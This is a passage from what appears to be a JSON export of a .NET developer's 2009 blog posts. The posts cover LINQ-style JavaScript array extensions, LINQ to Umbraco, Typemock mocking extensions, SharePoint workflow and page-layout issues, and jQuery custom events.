}).orderBy().groupBy(function(item) { return item.value; });  Lovely isn't it.\nBut before I get into some of the stuff I do, let me explain why my approach is different to the JSLINQ project on Codeplex.\nNow I mean no disrespect to Chris, but there are a few things which I don't like about his approach, and which kind of go against the LINQ pattern.\nFirst off JSLINQ requires that you create a new object which you pass the array into. I can see some reasons for this, better intellisense, more strict control over collection manipulation (the collection becomes read-only) but I think that the primary reason must be to better support object-notation arrays (you know, [] arrays). When you define an array using object notation it's not really an array (typeof [] === \"object\"). This is a problem if you want to LINQify it, you need to pass it to some other type.\nThe second issue I have with it is the naming. All the methods are named with Pascal Casing, which is the standard in .NET land, but every JavaScript library I've ever used (and as is standard) uses Camel Casing for methods. Sure Pascal keeps its relationship to .NET valid, but when trying to appeal the JavaScript developers it's just a bit foreign.\nLastly I'm a bit bothered by the lack of argument checking. This may be because I'm a very defensive programmer, but I don't like to allow developers to shoot themselves in the foot. If a parameter should be a function, then the paramter should be checked as a function. If a parameter is required, it should be checked as such.\nThis is more of a personal preference than a real design flaw though.\nMy approach\nNow that I've talked aobut what I don't like with the JSLINQ project I think it's only fair to talk about my approach. I've gone with a more traditional LINQ approach and added extensions to an existing type, in this case the Array type, via Array.prototype. This means it is closer to the extension-method format of IEnumerable<T> from .NET, you just need to add in a namespace (aka, include the JavaScript file), but does have a problem of allowing the collection to be modified (which does have pros and cons).\nI have also kept with standard JavaScript programming and Camel Cased the method names.\nThe following operators are supported:\nWhere Order By (inc decending) First/orDefault Single/orDefault Last/orDefault Select GroupBy IndexOf By and large the word under the hood with for loops, taking a method (aka a Lambda function) and using it.\nAs I said I'm a defensive programmer so there is a lot of type-checking against the arguments and the return types of methods (for example, ensuring the the Where lambda returns a boolean).\nGroupBy is my most proud operator, as it turned out to be a bit harder than I had though. But it does return a collection which is also a pesudo-dictionary which can be itterated through.\nI would provide the full source code but there seems to be a problem with current Umbraco instance running my blog which wont let me upload media items!\nBut here's the Where and GroupBy operators:\nArray.prototype.where = function(fn) { /// Filters the array /// Filtering function /// if (typeof (fn) !== typeof (Function)) throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"where takes a function to filter on\"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== \"boolean\") throw Error.argumentType(\"fn\", typeof (ret), typeof (Boolean), \"function provided to where much return bool\"); else if (ret) coll.push(this[i]); } return coll; } Array.prototype.groupBy = function(fn) { /// if (!fn || typeof (fn) !== typeof (Function)) { throw Error.argumentType(\"fn\", typeof (fn), typeof (Function), \"groupBy takes a function to filter on\"); } var ret = new Array(); for (var i = 0; i < this.length; i++) { var key = fn(this[i]); var keyNode = ret.singleOrDefault(function(item) { return item.key === key; }); if (!keyNode) { ret[ret.length] = { "key": key, "items": new Array() }; ret[ret.length - 1].items.push(this[i]); } else { ret[ret.indexOf(keyNode)].items.push(this[i]); } } return ret; }  \n", "id": "2009-04-20-linq-in-javascript" }, { "title": "SharePoint feature corrupts page layout", "url": "https://www.aaron-powell.com/posts/2009-03-24-sharepoint-feature-corrupts-page-layout/", "date": "Tue, 24 Mar 2009 19:39:28 +0000", "tags": [ "SharePoint" ], "description": "", "content": "Something that I've come across a few times when working on SharePoint/ MOSS 2007 features. When importing a Page Layout the ASPX some times becomes corrupt. You end up with additional HTML inserts once it's been imported into SharePoint.\nThe corruption is in the form of HTML tags, outside the last </asp:Content> tag.\nWell it turns out that the problem is caused when you import an ASPX that has a </asp:content> tag it'll happen.\nDid you notice the problem?\nThat's right, if you have a lowercase c then it'll import corrupt. Let me show the problem again, highlighted this time:\n</asp:content>\nAll you need to do is ensure that that has a capital letter, so the tag is </asp:Content> and it's all good again.\nThe most common cause of this happening is doing a format-document within Visual Studio on the ASPX when it is in the features class-library project. Visual Studio doesn't handle the ASPX file correctly, and formats it as a raw XHTML file, which dictates that the XHTML tags need to be in all lowercase.\nThe things you discover... \n", "id": "2009-03-24-sharepoint-feature-corrupts-page-layout" }, { "title": "Building a LINQ provider - Step 0", "url": "https://www.aaron-powell.com/posts/2009-03-23-building-a-linq-provider---step-0/", "date": "Mon, 23 Mar 2009 08:48:02 +0000", "tags": [ "LINQ" ], "description": "", "content": "Since I've started writing LINQ to Umbraco I have been doing a lot of investigation into the way that LINQ works and how to go about building your own custom LINQ provider. One thing I've noticed is there is a distinct lack of information on the web in about how to do this. Matt Warren has a really good series on building a LINQ provider, but it's still related to SQL translations. Bart De Smet is also a really great blogger who has done quite a bit on LINQ, it's kind of the LINQ guy. He's written the LINQ to SharePoint tool, LINQ to Active Driectory, LINQ to MSI, LINQ through PowerShell, and the list goes on. I really suggest you have a read through his posts. I'll be doing a lot of referencing to his posts throughout this series.\nFirst off, a bit of a disclaimer. This series is a work in progress, I'll quite probably go back on what I say during the series as I'm still really learning what I'm trying to achieve. Everything I post here is stuff that I have learn by reading blog posts (and I'll link where applicable), reflecting LINQ to SQL and reading source code of open source projects such as LINQ to ShaerPoint. This series is as much for myself as it is for anyone else. There a lot of stuff you need to know when it comes to building a query provider and trying to keep it all in my brain is really starting to hurt :P. I've already looked at sections of my code and had to think long and hard about what they do. I've also had a lot of code already refactored several times!\nSo lets get started!\nGetting started - What provider model? I'm making the assumption that you're chosen what you're going to provide a LINQ support for, now the question is how do you go about providing the LINQ support. There are two model of how to go about providing LINQ support, via IQueryable<T> or via method chaining. Method chaining? What's that you say? As I pointed out in my post A LINQ Observation LINQ query syntax is really just syntactical suger; all statments ultimate compile down to chained method calls. This means that you can quiet easily provide a LINQ provider without implementing IQueryable<T>. In fact, have a look in Reflector, there's actually not much which it implements. All the Where, Select, Join, etc statements reside within the the class System.Linq.Queryable (in System.Core) as extension methods! That means, if you provide a method with the construct:\npublic IEnumerable<TResult> Select<T, TResult>(Func<T, TResult> selector) { ... } You can quite easily write your own LINQ provider. I could go on about this, but it's best covered by Bart De Smet in his post Q: Is IQueryable the Right Choice for Me?, The Most Funny Interface of the Year … IQueryable<T>, and then an example of how to achieve this is through his LINQ to MSI series (starting here). The primary advantage of using method chaining over the top of IQueryable is that it allows you to have compile time checking of LINQ expressions. This is a very powerful concept if you don't have a data provider which is capable of supporting everything which LINQ has within it. LINQ to MSI is a great example. As Bart points out the MSI query language is very SQL-like, but it doesn't support all the operations. By implementing LINQ via the method chaining manner rather than via a full IQueryable interface when compiling a user will know what operations are and aren't available. Don't take my word for it, have a read through the series. It's very interesting and it really opens your eyes to what LINQ is and how it is really implemented.\nFor LINQ to Umbraco I chose to use the IQueryable model. The reason for this is that LINQ to Umbraco (in its current implementationhint hint) is going to be querying against the Umbraco XML file. This means it is actually built on top of LINQ to XML. Since LINQ to XML already supports all the standard LINQ operations I don't see any point in restricting what the developer has within his toolkit. It is true that I'm not likely to ship all the operations (there's a hell of a lot to cover off!), but the framework will be there for all the standard operations to be supports. This does mean that until runtime there wont be any checking of the syntax so you're likely to have a NotImplementedException thrown, but hopefully the documentation will outline what is and isn't available *cough*.\nWell hopeful this has given a starting point and some background reading for building a LINQ provider and given you some thinking about what to do before jumping straight into coding. The most important part of a LIQN provider is thinking it through from the outset!\n", "id": "2009-03-23-building-a-linq-provider---step-0" }, { "title": "LINQ to Umbraco update", "url": "https://www.aaron-powell.com/posts/2009-03-20-linq-to-umbraco-update/", "date": "Fri, 20 Mar 2009 15:14:27 +0000", "tags": [ "LINQ", "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "As I mentioned in a previous post I'm working on a LINQ provider for Umbraco, a proper one, not one which is exploiting the operations on LINQ to Objects.\nWell I thought I'd do an update on the progress that'd been made thus far on it. This comes on the back of yesterdays post where I eluded to something exciting.\nI've completed the main codebase for the DocType Markup Language (DTML) generator last week. Currently it's stuck as a console application which you run, I'm going to be working on the Visual Studio tool, so it can generate like LINQ to SQL does with the DBML. That's proving to be a bit more of a problem than I had hoped, so it's popped on the backburner for the moment. Visual Studio integration is a \"nice to have\", not a \"must have\".\nThe DTML generator, as mentioned, is a console application which runs directly against the Umbraco database. It generates an XML file which represents the DocTypes in your site. This can then be used to generate .NET code in the form of C# of VB.NET (depending on your preferences). Documentation on how to run it will be provided in the future, but there is a help switch for the mean time! :P\nBut why generate an XML file and a .NET file? Well other than desire to have it work from Visual Studio it provides a different feature. The XSD for the DTML file is available within the LINQ to Umbraco source (and it's 85% of the exported DocType XML), and if you spend the time having a read of it you should be able to work out how to hand-code one of them.\nThis means that you'll be able to have your classes generated, code written and unit tested, without even having to install Umbraco. This means devs can get started while the UI/ front end guys are putting the site together.\nBut now for the exciting news, in the last week I've turned my attention to the most important section of the project, the LINQ provider. And in todays commit to Codeplex I added 6 new (passing) tests for LINQ select statements!\n*holds for applause*\nThat's right, there is support for LINQ select statments in both Lambda and Query format. The following works:\nSelect returning type of collection (ctx.CwsHomes) Select returning single property (ctx.CwsHomes.Select(h => h.Bodytext)) Select returning annonymous (ctx.CwsHomes.Select(h => new { h.Bodytext, h.CreateDate} )) True that it's not super useful, there's no filtering yet, but what is done is a good start (and a whole lot sooner than I expected to get it working :P).\nI'm not going to provide a package to download, you can get the full source code from the Umbraco project on Codeplex (under the 4.1 branch).\n", "id": "2009-03-20-linq-to-umbraco-update" }, { "title": "A LINQ observation", "url": "https://www.aaron-powell.com/posts/2009-03-19-a-linq-observation/", "date": "Thu, 19 Mar 2009 12:44:44 +0000", "tags": [ "LINQ", "LINQ to SQL", "Umbraco", "LINQ to Umbraco" ], "description": "", "content": "Well I'm making good headway with LINQ to Umbraco, in the next few days I'll be doing a very interesting check in (which I'll also blog here about). My tweet-peeps already have an idea of what it entails, but there's a bit of a problem with it still which I want to address before the commit.\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, or LINQ to Umbraco, etc).\nI'll use LINQ to SQL for the examples as it's more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items;\nThat statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it's not executed yet, no DB query has occured, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item;\nThis time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here's the interesting part, they are not the same. That's right, although you're getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item);\n \nBut is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. You'll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you're not doing a redundant call to Select. But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2009-03-19-a-linq-observation" }, { "title": "I still don't get Twitter", "url": "https://www.aaron-powell.com/posts/2009-03-10-i-still-dont-get-twitter/", "date": "Tue, 10 Mar 2009 19:23:57 +0000", "tags": [ "Random Junk" ], "description": "", "content": "So Karl posted today (well, tomorrow at 2.29am or something, yeah my blog isn't the only one who's dates are freaky!) asking what value Twitter adds.\nAs I recently posted I have a twitter account and I don't really get the point either.\nBut I must confess, I'm getting more into it, well, into it but still not getting its point.\nOriginally when I got onto as I was trying to get a hold of Niels, he was away from his email at the time and I knew he was still checking that :P\nNow I do use it a bit more, mainly I use it still to follow Umbraco stuff, but I also follow some others. I started following Elijah Manor who seems to do nothing but find other interesting blogs on the topic of AJAX, jQuery, etc. I've had a lot of interesting stuff come across his feed.\nI also started following Paul Stovell since his blog went down and he's tool lazybusy to fix it.\nI definately don't get the point of if for the I'm Pooping tweets :P\n \nInteresting side-note, my 4th largest source of traffic to my blog is Twitter!\n", "id": "2009-03-10-i-still-don't-get-twitter" }, { "title": "A nifty Typemock extension on steroids", "url": "https://www.aaron-powell.com/posts/2009-03-06-a-nifty-typemock-extension-on-steroids/", "date": "Fri, 06 Mar 2009 13:04:47 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "So in my last post I showed a nifty Typemock extension for doing repetition within Typemock's AAA syntax on the WhenCalled method. When I wrote that extension it was only done in a rush and it had 1 flaw, you couldn't do method chaining to do the n+1 action, you had to do it on a separate line.\nWell I spent another 5 minutes on it and added this feature (plus a repeat on CallOriginal). Here's the updated extension set:\npublic static class Extensions { public static ActionRepeater<TReturn> WillReturnRepeat<TReturn>(this IPublicNonVoidMethodHandler<TReturn> ret, TReturn value, int numberOfReturns) { for (var i = 0; i < numberOfReturns; i++) ret.WillReturn(value); <span class="keyword">return new</span> <span class="const">ActionRepeater</span>&lt;TReturn&gt;(ret); } <span class="keyword">public static</span> <span class="const">ActionRepeater</span>&lt;TReturn&gt; CallOriginalRepeat&lt;TReturn&gt;(this <span class="const">IPublicNonVoidMethodHandler</span>&lt;TReturn&gt; ret, <span class="keyword">int</span> numberOfReturns) { <span class="keyword">for</span> (<span class="keyword">var</span> i = 0; i &lt; numberOfReturns; i++) ret.CallOriginal(); <span class="keyword">return new</span> <span class="const">ActionRepeater</span>&lt;TReturn&gt;(ret); } } <span class="keyword">public class</span> <span class="const">ActionRepeater</span>&lt;TReturn&gt; { <span class="keyword">private</span> <span class="const">IPublicNonVoidMethodHandler</span>&lt;TReturn&gt; _actionRepeater; <span class="keyword">public</span> <span class="const">ActionRepeater</span>&lt;TReturn&gt;(<span class="const">IPublicNonVoidMethodHandler</span>&lt;TReturn&gt; actionRepeater) { _actionRepeater = actionRepeater; } <span class="keyword">public</span> <span class="const">IPublicNonVoidMethodHandler</span>&lt;TReturn&gt; AndThen() { return _actionRepeater; } }  \nI'll admit that I have made it a touch verbose to use, but I think it's better to convey what is happening to other people reading the tests (it's a lot like Rhino Mocks in verboseness I guess). So to use it now all you need to do is:\nIsolate.WhenCalled(() => someMock.SomeMethod()).WillReturnRepeat(true, 3).AndThen().CallOriginal(); //or, chained repeats! Isolate.WhenCalled(() => someMock.SomeOtherMethod()).WillReturnRepeat(\"Hello World\", 2).AndThen().WilLReturnRepeat(\"Good-bye World\", 2).AndThen().CallOriginal(); Makes for some really crazy mocks ;)\n \nPS: You can use the Repeat extensions with a repeat number of 1 if you want just method chaining too:\nIsolate.WhenCalled(() => someMock.SomeMethod()).WillReturnRepeat(true, 1).CallOriginalRepeat(1).ReturnRecursiveFakes();", "id": "2009-03-06-a-nifty-typemock-extension-on-steroids" }, { "title": "A nifty Typemock extension", "url": "https://www.aaron-powell.com/posts/2009-03-03-a-nifty-typemock-extension/", "date": "Tue, 03 Mar 2009 22:49:47 +0000", "tags": [ "Unit Testing", "Typemock" ], "description": "", "content": "Using AAA with Typemock there's a bit of a problem if you want to repeat the returned value a number of times before then doing something different. It's very useful if you are accessing a mocked object within a loop and want to know the number of loop execution.\nSo I've put together a simple little Typemock extension (but I'm sure it'd adaptable for any mock framework supporting AAA):\npublic static void WillReturnRepeat<TReturn>(this IPublicNonVoidMethodHandler ret, TReturn value, int numberOfReturns) { for (var i = 0; i < numberOfReturns; i++) ret.WillReturn(value); } You then just use it like this:\nIsolate.WhenCalled(() => mockObject.SomeMethod()).WillReturnRepeat(true, 3); Isolate.WhenCalled(() => mockObject.SomeMethod()).CallOriginal(); So the mock will return true 3 times and it will do the original call (for the purpose of this demo we'll assume it would return false).\nAnyone else got some nifty Typemock extensions?  \n", "id": "2009-03-03-a-nifty-typemock-extension" }, { "title": "An observation on browsers", "url": "https://www.aaron-powell.com/posts/2009-03-01-an-observation-on-browsers/", "date": "Sun, 01 Mar 2009 17:09:38 +0000", "tags": [ "Random Junk" ], "description": "", "content": "I've been a big fan of the Opera web browser for a number of years, I've used it since it's v4 days. I remember it being an ad-supported browser and I remember when it became free (that was a great day!). I remember it being a very innovative browser (and it still is) with this such as:\nTabbed browsing Mouse gestures Speed Dial Session Management It's served me well for a long time, on every platform from Windows to Linux to Mac OS X, and even mobile devices.\nBut this weekend things haven't been so good, Opera started crashing on me, constantly, even when the browser was in the background in an idle state.\nSo I've reverted back to using Safari. I could use Firefox, but I've never been a fan of Firefox as a daily browser. I find it a great web dev tool thanks to the plugin engine, but it's always felt cumbersome as a daily browser. It is heavy and slow to start up, and it's never had a good feel to it as a daily browser.\nBut Safari is starting to shit me. Since that Safari 4.0 beta came out this week I thought it'd be an idea to have a crack at it, see how it goes. Well I can tell you, it's currently not going.\nFirst off, I had to install a security patch before I could install the browser. Ok, fine, I hadn't been keeping up-to-date with the paths, but c'mon, it's a single patch which had only just been released!\nSo I installed the patch, which required a reboot, and then re-ran the Safari 4 installer.\nAnd that didn't exactly go well, to install Safari 4 on a latest-patched OS X 10.5 install you need 107Mb of hard drive space! WTF?! It's just a browser! People blame Microsoft software for being bloated, but I'm pretty sure that the IE 8 beta isn't that big!\nThe next hurdle is that it requires me to reboot to install. Again, WTF?! IT'S JUST A BROWSER!\nThis is something that's really starting to piss me off about OS X, it's worse than Vista when it comes to reboot-on-install, and worse off is that you have to be rebooting for the install to take place. Unlike Vista which you can install and it'll finish the install during the reboot OS X requires you to do the complete reboot while installing.\nBUT WHY DO I NEED TO REBOOT FOR A BROWSER!? (I've got another gripe about having to reboot to install the new version of Quicktime, why the fuck do I have to reboot to install a media player, but that's a rant for another day)\nSo I'm sticking with Safari 3 for now, and I'm starting to realise just how limiting it is as a browser, compared to the others of its generation.\nLets first compare it with IE 7, the Microsoft browser of the same generation. By-and-by they are as good as each other. But there's one glaring feature that Safari lacks compared to IE is session management. It's a common feature across current generation browsers, remembering what you were doing when you exited so when you next pick it up you are where you were previously.\nBut I can't for the life of me work out where I can turn it on.\nAnother feature I can't seem to work out is how to have images shown at the full size, not scaling it to the window by default. It's a simple to turn off in IE, but so far it's eluding me in Safari.\nLastly I'm finding that Safari always wants to download files where it wants, I never get asked. Again, a feature of all current browsers, except Safari.\n \nOverall what I've noticed with Safari and IE alike, is that OS-related browsers are well behind the curve. With a release cycle like Opera and Firefox not being tied to that of an OS they can push them out a lot faster, leaving the others behind.\nSafari is an Ok browser, like IE is an Ok browser. But I wish I could get Opera back, and I wish that Umbraco would work from it :P \n", "id": "2009-03-01-an-observation-on-browsers" }, { "title": "Typemock AAA - Faking the same method with different parameters", "url": "https://www.aaron-powell.com/posts/2009-02-25-typemock-aaa---faking-the-same-method-with-different-parameters/", "date": "Wed, 25 Feb 2009 20:36:49 +0000", "tags": [ "Unit Testing", "Umbraco", "Typemock" ], "description": "", "content": "As I stated in my last post (oh so 5 minutes ago! :P) I'm working on a new project for the Umbraco team, one thing I'm really focusing hard on with LINQ to Umbraco is Test Driven Development (TDD), and with that I'm using Typemock as my mocking framework (since I scored a free license I thought I should use it).\nThe Arrange, Act, Assert (AAA) is really sweet, but it does have a problem, it doesn't support mocking a method call with different parameters. I can't call the same method 3 times and have a different output depending on what was passed in.\nMakes for a bit of a problem when you want to test conditionals against your mock. I have requested the feature, but for the time being I found a nice little work-around, Extension Methods!\nSo I'm mocking the IRecordsReader from the Umbraco DataLayer, and I want to have something different returned depending on the parameter of the GetString method, so I created extensions like this:\npublic static string GetName(this IRecordsReader reader){\nreturn reader.GetString(\"Name\");\n}\nNow I can easily do this:\nIsolate.WhenCalled(() => fakeReader.GetName()).WillReturn(\"Name\");\nIsolate.WhenCalled(() => fakeReader.GetString(\"SomethingElse\")).WillReturn(\"Not Name\");\n// do something with fakeReader\nIsolate.Verify.WasCalledWithExactArguments(() => fakeReader.GetName());\nIsolate.Verify.WasCalledWithExactArguments(() => fakeReader.GetString(\"SomethingElse\"));\nThis obviously isn't the best way to do it, does mean that you have to then use extension methods when you are writing the code to use it.\nBut that's not really a problem for me at the moment, I'm doing a lot of the same data reading from the IRecordsReader so I can easily do the extension method.\nNow if they will just add the support like Rhino Mocks has then it'll be sweet!\n", "id": "2009-02-25-typemock-aaa---faking-the-same-method-with-different-parameters" }, { "title": "UIL v1.1 release, and some sadness", "url": "https://www.aaron-powell.com/posts/2009-02-25-uil-v11-release-and-some-sadness/", "date": "Wed, 25 Feb 2009 20:14:20 +0000", "tags": [ "Umbraco", "Umbraco.InteractionLayer" ], "description": "", "content": "Well today I have produced the latest version of the UIL, v1.1, which can be downloaded here: http://www.codeplex.com/UIL/Release/ProjectReleases.aspx?ReleaseId=23765. This version addresses a problem found with the IsDirty state when opening existing documents.\nDuring a development implementation of it there it was noticed that when you opened existing documents the IsDirty always returned true.\nThis is now fixed, and I also addressed another problem which was realised. It was actually a design limitation, not a bug (per-say). I had the UIL relying on the ID's of the DocTypes at time of generation, this posed a problem when using the UIL on existing websites. When you tried to deploy the DocTypes into a new environment using Umbraco Packaging (or manually creating them), a new ID would be generated! This posed a big problem. Instead I have change it so the UIL relies on the alias at time of generation, which isn't 100% unique, but it's unique enough ;).\n \nBut there is also a bit of sadness in this post, as this post signals the final installment of UIL being under active development (although I use the term active loosely :P). I will no longer be actively adding features to the UIL, unfortunately I no longer have the time to dedicate to the project and implement the features which I had intended to implement. I will try and implement fixes for any bugs which people find, but really I don't have enough time to work on anything new for the UIL.\nBut it's not all sad, there is a good reason which I no longer have the time to dedicate to the UIL, it is because I have taken on a bigger project. After speaking with Niels and the other guys who make up the Umbraco project I've been asked to develop a proper LINQ to Umbraco implementation. That's right, I'm currently working to produce what the UIL was originally going to become, a LINQ provider for Umbraco.\nI'm going to keep some of the details secret, but I'll just say that at the moment the UIL isn't going to be completely replaced by LINQ to Umbraco, rather it's going to be suplimented by it. Where UIL is all about how to interact with Documents and Document creation LINQ to Umbraco is going to be all about interacting with published nodes and the Umbraco node cache.\nSo be on the lookout for some really interesting posts in the coming weeks/ months in which I'll provide more details on LINQ to Umbraco, or feel free to watch the progress of the of the code on Codeplex..\nSo sad times, with happy times.\n", "id": "2009-02-25-uil-v11-release-and-some-sadness" }, { "title": "Programmatically modifying SharePoint workflows", "url": "https://www.aaron-powell.com/posts/2009-02-22-programmatically-modifying-sharepoint-workflows/", "date": "Sun, 22 Feb 2009 00:00:00 +0000", "tags": [ "sharepoint", "rant" ], "description": "", "content": "First off, let me start by saying that I often really hate SharePoint. Well maybe I should be a bit more specific, I really hate Publsihing Portals in Microsoft Office SharePoint Server 2007.\nWindows SharePoint Services 3.0 I think is a great product, and the MOSS extensions are really quite awesome (Excel Services, enterprise search, etc), but Publishing Portals are shit.\nOk, I better stop or I'm going to keep ranting and not do this post.\nI'm building a MOSS publishing site at the moment, and the client wants a multiple stage workflow. Luckily I found a really great blog post on how to do that with the standard MOSS approver workflow (link), but there's a problem, this only modifies the workflow on the current Publishing Site, any time a new one is created the change has to be done again.\nNow I really didn't want to have to have the client constantly doing this, I kept thinking there has to be a better way. So I did what any good SharePoint developer does, pulled out my copy of Reflector and started digging through the workflow code.\nThen I got sad, the workflow is an InfoPath form it seemed, or at least I have no really easy way to edit it. It doesn't seem like there is a way in which I can do anything to the workflow, because the workflow doesn't really maintain the data I need, then I found the SPWorkflowAssociation class, this is what maintains the relationship between the workflow template selected (see SPWorkflowTemplate) and the SPList (in my case, the Pages list of the Publishing Portal).\nSo now I'm really boned, I don't seem to have anything within the API I can do to set the workflow approver accounts, my other option is to create a new Site Definition.\nShit.\nSite Definitions are scary, really bloody scary. I've read the theory on how to do them but never attempted it, and I'm not sure it's something I want to try and learn on-project!\nShit.\nSo while staring at the API I had an epiphany, SPWorkflowAssociation has a property AssociationData, I did a dump with LINQPad to work out what it contained and wow, this is exactly what I wanted, it may be in XML format but I can deal with that. Any SharePoint developer is use to working with XML which has next to no documentation (CAML is painfully undocumented, and then there's Solutions, Features, Site Definitions, etc!) so I can deal with this.\nWell there's an easy way to get my XML, just create is as-needed and then set it as a string back to a new instance.\nAnd then the next problem came up, there's no Update method on SPWorkflowAssociation! Damnit! But you wouldn't not believe how happy I was to find SPList.UpdateWorkflowAssociation(SPWorkflowAssociation), oh yeah, WIN!\nThen I end up with this bit of code:\nusing(SPSite site = new SPSite(\"http://localhost\")) {\nusing(SPWeb web = site.OpenWeb()){\nPublishingWeb pubWeb = PublishingWeb.GetPublishingWeb(web);\nSPWorkflowAssociation wfa = pubWeb.PagesList.GetWorkflowAssociationByName(\"Parallel Approval\");\nSPWorkflowAssociation wfa = pubWeb.PagesList.WorkflowAssociation[\"Parallel Approval\"];\nwfa.AssociationData = @\"...\"; //ommited\npubWeb.PagesList.UpdateWorkflowAssociation(wfa);\npubWeb.PagesList.Update();\npubWeb.Update();\nweb.Update();\n}\n}\nI've not included the XML as it's a bit large, but it's not exactly required.\nThe next question is how do you deploy this? You need a way that it can be done for each new site created, but as far as I'm aware there isn't any way I can tie into the site creation.\nSo to get around this I've come up with an idea I was quite happy with, a SharePoint Feature, scoped at a Web level.\nThen all that is needed to do is when a new site is created the feature can be manually activated. This makes it nice and easy to have a deployable WorkflowAssociation. You could (kind of) use the above code to deploy a new Workflow Association, if required.\n*Edit - As Keith has pointed out I had a mistake, there is no name indexer on SPWorkflowAssociationCollection. I was coding from memory and thought I had it right, guess not. I've updated the example to what it should be. I should stop blogging from memory if it wasn't the day I wrote the code :P\n", "id": "2009-02-22-programmatically-modifying-sharepoint-workflows" }, { "title": "Umbraco 4 broke my project!", "url": "https://www.aaron-powell.com/posts/2009-02-05-umbraco-4-broke-my-project/", "date": "Thu, 05 Feb 2009 00:00:00 +0000", "tags": [ "umbraco" ], "description": "", "content": "Umbraco 4 may have been out for a week now but I've been busy and I am only slowly getting to upgrading a project I've been working on to the current build.\nBut I finally got around to it, and because there's a big custom .NET component to it I compiled against the upgraded DLL's, but there was a problem, I got the following compile error:\nThe referenced assembly 'businesslogic, Version=1.0.3317.32687, Culture=neutral, PublicKeyToken=null' could not be found. This assembly is required for analysis and was referenced by: 'MyProject.dll', 'cms.dll'.\nWell that's no good, and from looking at the cms.dll it's right, it expects that, but businesslogic.dll is only version 1.0.3317.17186.\nCrap.\nSo I re-download the package, may I did something wrong. Nope, that's not it. So I check another person running v4 final. Nope, that's not it.\nCrap!\nSo I create a new project, add the references. This one compiles.\nCrap!!\nThen I take a closer look at the output window; doing this I see that the problem is caused during the running of FxCop. Then it hits me, FxCop is trying to bring in all the references, probably via reflection. Because cms.dll is using a difference version it then freaks out!\nNo one else was using FxCop, nor was the new project I created!\nWell there you have it, if you're doing development againt the Umbraco API's be careful that they have released the correct versions to you!\n", "id": "2009-02-05-umbraco-4-broke-my-project" }, { "title": "Umbraco Interaction Layer v1.0 available", "url": "https://www.aaron-powell.com/posts/2009-02-01-umbraco-interaction-layer-v10-available/", "date": "Sun, 01 Feb 2009 00:00:00 +0000", "tags": [ "umbraco", "Umbraco.InteractionLayer" ], "description": "", "content": "Well it's been 6 months since I first announced the Umbraco Interaction Layer project, but I'm happy to announce that v1.0 is available on the CodePlex site for download!\n*Pauses for dramatic effect*\nThe v1 release supports Umbraco 4.0.0 and Umbraco 3.0.x.\nThe following are the major changes between the UIL RC and v1.0 release:\nFixed the DataContractAttribute so it is now included on all generated classes (I didn't realise it wasn't inherited!) Pluralised names of the generated LINQ interfaces are now more likely to be correct English DocTypeBase has a Published property on it so it's easier to check the state of a document Speaking of having v4 support one thing I wasn't initally aware of with v4 was the nested DocType feature. I'm happy to announce that this is supported in the UIL release (for v4). It's not quite as nice as I'd like (it doesn't use class inheritance), the properties from a parent DocType are just included on the child.\nThere are some known limitations which are:\nGenerated properties are using the underlying database type, which does mean that DataTypes such as Content Picker and Media Picker will generate an int property not a URL, string or custom-class property The underlying Umbraco interface is provided by umbraco.cms.businesslogic.web.Document. This means that the access is directly with the Umbraco database not the umbraco.config xml files. I strongly recomment that when you are getting an existing object that you load via the Version GUID of the umbraco.presentation.nodeFactory.Node object. This will ensure you are loading the current published verion. When loading from the integer ID you will load the last saved version  When generating a class which a child relationship you need to include the child DocType to ensure that the LINQ interface is generated. The generation engine is unable to generate a child relationship of it isn't also generating the class for the child at the same time. This problem is also compounded by the fact there isn't any way to view the child relationships from the dashboard UI for generating classes  \nI really would love to hear from anyone who does have a play with the UIL, good and bad feedback.\nI'm going to be looking at the v-next version soon so I will be looking for feedback of areas to improve or implement.\nAnd one last thing, get LINQ-ing with Umbraco!\n", "id": "2009-02-01-umbraco-interaction-layer-v10-available" }, { "title": "Custom eventing with jQuery", "url": "https://www.aaron-powell.com/posts/2009-01-31-custom-eventing-with-jquery/", "date": "Sat, 31 Jan 2009 00:00:00 +0000", "tags": [ "jquery", "javascript" ], "description": "", "content": "Last Thursday I attended a session through Victoria.NET on jQuery hosted by Damian Edwards.\nIt was a good beginner session on jQuery, I was familiar with most of it but there were a few sweet little gems shown.\nDuring the session when Damian was talking about eventing with jQuery someone asked him a question about doing custom events. Damian wasn't sure how to go about this, or if it was possible.\nWell it is possible and I'll go over how to achieve it.\nBecause of jQuery's nature it's very easy to add custom events to both dom objects and custom objects.\njQuery has lots of events built in, via the click(), keydown(), etc. But ultimately they all implement the bind() method. The just provide click, keydown, etc as the type argument of the method.\nBut bind() can take anything as a type argument, try this:\n$('p').bind('HelloWorld', function() { alert('Hello World event called'); }); Now all <p /> tags on the page have an event called HelloWorld which is just waiting to be called, so how do we do that?\n$('a').click(function() { $('p').triggerHandler('HelloWorld'); }); Yep, the triggerHandler() method will call any of the event handlers which are bound to the objects in the selector.\nObviously this is a bit of a sanitised example, doing that on all elements isn't exactly useful. But it does show that it can be done. With more powerful selectors it's quite possible to set up events similar to using the $addHandler() method within the ASP.NET AJAX library, like is done within the controls in the AJAX Control Toolkit.\nIt also means that it would be quite possible to set up a Client Event Pool similar to what I talked about in the recent post Fun with a Client Event Pool and modal popups.\n", "id": "2009-01-31-custom-eventing-with-jquery" }, { "title": "Not getting DropDownList value when setting it via JavaScript", "url": 